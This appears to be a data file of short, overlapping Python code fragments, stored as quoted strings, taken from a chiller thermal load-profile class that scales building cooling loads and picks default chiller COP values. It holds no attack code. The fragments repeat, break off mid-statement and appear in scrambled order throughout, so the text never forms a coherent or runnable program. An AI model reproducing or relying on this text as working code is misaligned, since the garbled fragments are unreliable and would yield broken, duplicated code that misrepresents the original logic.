"method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)",
"np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller",
"be the sum # of the default annual loads for this location if",
"1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual",
"always expected to be in units of kWth if electric_load_list is not None:",
"so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else:",
"import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load",
"estimated max chiller load if self.chiller_cop is None: if electric_load_list is not None:",
"on CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r')",
"total site load will be the sum # of the default annual loads",
"or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update COP based",
"percent shares are later applied that the total site load will be the",
"else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None,",
"max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not",
"elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is",
"inputs as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude",
"= list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0))",
"if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not None:",
"percent share of annual load to each partial load if (len(doe_reference_name) > 1):",
"elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is",
"annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40,",
"in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to",
"above. This scalar makes it such that # when the percent shares are",
"the loop above. This scalar makes it such that # when the percent",
"not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\",
":param longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int)",
"= LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can",
"= self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] =",
"in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)*",
"longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param",
"loads are used in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is",
"be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a",
"get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif",
"f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\":",
"kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are used in place",
"or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read())",
"and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i,",
"data_manager to which this load object will be added :param total_electric_load_list: (array) electric",
"in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the",
"profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None #",
"[kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based on kwth load",
"elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in",
"longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None, used",
"LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs):",
"sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load",
"if we need to covert kWh to kWht electric_load_list = None # Use",
"= self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a list",
"that # when the percent shares are later applied that the total site",
"views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be",
"kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list]",
"is not None): #load_list is always expected to be in units of kWt",
":param dfm: (object) data_manager to which this load object will be added :param",
"time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or int)",
"in total_electric_load_list] #Calculate COP based on kwth load or kw load (if not",
"place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] =",
"that the total site load will be the sum # of the default",
"total_electric_load_list] #Calculate COP based on kwth load or kw load (if not user-entered)",
":param chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float",
"hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\")",
"is not None: #This is a static method so it can be accessible",
"= doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs)",
"the sum # of the default annual loads for this location if (len(doe_reference_name)",
"LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load shapes or user-defined",
"with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults",
"shares # for consistency we want to act as if we had scaled",
"a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons",
"pd import numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT",
"electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by a",
"self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user",
"supplies a list of doe_reference_names and percent shares # for consistency we want",
"if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads",
"not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP",
"doe_reference_names and percent shares # for consistency we want to act as if",
"this load object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting",
"datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on",
"electric_load_list is not None: #This is a static method so it can be",
"be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always",
"site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile",
"kWh to kWht electric_load_list = None # Use highest resultion/quality input first if",
"None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be in",
"TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\",
"reo.src.load_profile import BuiltInProfile import os import json import pandas as pd import numpy",
"'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = {",
"# If no doe_reference_name or loads_ton provided, scale by a fraction of electric",
"supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if",
"or int) maximum thermal factor on peak load for the Chiller :param kwargs:",
"to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None",
"sum # of the default annual loads for this location if (len(doe_reference_name) >",
"loads_ton provided, scale by a fraction of electric load elif kwargs.get('loads_fraction') is not",
"of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"]",
"= self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] =",
"= [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no",
"# Monthly loads can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy']",
"based on estimated max chiller load if self.chiller_cop is None: if electric_load_list is",
"# Update COP based on estimated max chiller load if self.chiller_cop is None:",
"site load will be the sum # of the default annual loads for",
"latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager",
"chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or",
"self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None, used later",
"site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution",
"= [] for i in range(len(doe_reference_name)): # Monthly loads can only be used",
"kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour",
"for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total",
"from reo.src.load_profile import BuiltInProfile import os import json import pandas as pd import",
"resulting from parsed inputs :param latitude: (float) site latitude :param longitude: (float) site",
"scaled the partial load to the total site # load which was unknown",
"fraction of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) *",
"where the user supplies a list of doe_reference_names and percent shares # for",
"= list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None):",
"* (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\")",
"for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name or",
"are used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name =",
"CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as",
"json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69}",
"accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static",
"reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = []",
"max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt",
"loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load",
"dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm:",
"to each partial load if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist):",
"electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1),",
"total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude: (float) site",
"* np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list",
"load to the total site # load which was unknown at the start",
"year: (int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance",
"profile are used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name",
"had scaled the partial load to the total site # load which was",
"'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\":",
"location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for",
"is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in",
"shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] =",
"combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist),",
"site # load which was unknown at the start of the loop above.",
"later applied that the total site load will be the sum # of",
"electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for Chiller",
"(int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for",
"input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in",
"(float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time",
"None # Annual loads are used in place of percent shares if provided",
"self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it",
"to None, used later to see if we need to covert kWh to",
"None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile",
"None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt /",
"method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)",
"used later to see if we need to covert kWh to kWht electric_load_list",
"month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw",
"= LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units",
"LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of",
"import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based",
"= pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month",
"is a static method so it can be accessible in views.py self.chiller_cop =",
"is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude']",
"LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude :param longitude:",
"combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a list of doe_reference_names",
"time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop:",
"default annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is",
"None): #load_list is always expected to be in units of kWt self.load_list =",
"[] for i in range(len(doe_reference_name)): # Monthly loads can only be used to",
"enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw",
"None kwargs['annual_energy'] = None # Annual loads are used in place of percent",
"* \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\")",
"chiller load if self.chiller_cop is None: if electric_load_list is not None: #This is",
"\"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is",
"first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']]",
"or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum",
"is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to",
"max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw",
"Reference building profile are used if there is a reference name provided elif",
"= np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile",
"kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not",
"as pd import numpy as np from datetime import datetime from reo.utilities import",
"not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please",
"non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None",
"Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT",
"range(len(doe_reference_name)): # Monthly loads can only be used to scale a non-hybrid profile",
"= year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour",
"be in units of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop",
"for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction']",
"for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is not None: dfm.add_load_chiller_thermal(self)",
"i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] *",
"need to covert kWh to kWht electric_load_list = None # Use highest resultion/quality",
"None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist):",
"= latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] =",
"load will be the sum # of the default annual loads for this",
"from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load",
"np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list))",
"the default annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy']",
"[] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads can only",
"= \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def",
"load (if not user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated",
"BuiltInProfile import os import json import pandas as pd import numpy as np",
"# load_list is always expected to be in units of kWth if electric_load_list",
"\"\"\" :param dfm: (object) data_manager to which this load object will be added",
"1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for",
"kw for kw in total_electric_load_list] #Calculate COP based on kwth load or kw",
"loop above. This scalar makes it such that # when the percent shares",
"to be in units of kWth if electric_load_list is not None: self.load_list =",
"max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt",
"views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so",
"always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i",
"4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not",
"partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list =",
"share of annual load to each partial load if (len(doe_reference_name) > 1): for",
"simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or",
"#load_list is always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT",
"applied that the total site load will be the sum # of the",
"chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which this load object",
"start of the loop above. This scalar makes it such that # when",
"there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or []",
"longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to",
"in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour",
"100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None,",
"as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude =",
"is always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for",
"load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load",
"kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude']",
"the percent share of annual load to each partial load if (len(doe_reference_name) >",
"= None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not None:",
"self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If",
"total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or",
"latitude :param longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour:",
"= max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton,",
"raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons *",
"be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param",
"super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for",
"used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name')",
"which was unknown at the start of the loop above. This scalar makes",
"\"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if",
"value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else:",
"a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist =",
"self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is",
"[total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not",
"electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht =",
"latitude: (float) site latitude :param longitude: (float) site longitude :param nearest_city: (str) site",
"self.chiller_cop is None: if electric_load_list is not None: #This is a static method",
"if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[],",
"static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list),",
"not None): #load_list is always expected to be in units of kWt self.load_list",
"on kwth load or kw load (if not user-entered) self.chiller_cop = chiller_cop #",
"np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list =",
"(object) data_manager to which this load object will be added :param total_electric_load_list: (array)",
"are used in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not",
"load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is",
"kw in total_electric_load_list] #Calculate COP based on kwth load or kw load (if",
"is always expected to be in units of kWth if electric_load_list is not",
"is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None:",
"see if we need to covert kWh to kWht electric_load_list = None #",
"list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if",
"nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year",
"in kwargs['loads_ton']] # DOE Reference building profile are used if there is a",
"> 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist])",
"kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude",
"it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This",
":param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the",
"self.chiller_cop = chiller_cop # Update COP based on estimated max chiller load if",
"TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw",
"None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons =",
"kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)):",
"as if we had scaled the partial load to the total site #",
"numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile):",
"percent shares # for consistency we want to act as if we had",
"= kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads",
"be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy']",
"building profile are used if there is a reference name provided elif kwargs.get('doe_reference_name'):",
"kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual",
"kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list",
"partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a",
"in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list",
"kwth load or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update",
"user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated max chiller load",
"consistency we want to act as if we had scaled the partial load",
"= longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None,",
"and percent shares # for consistency we want to act as if we",
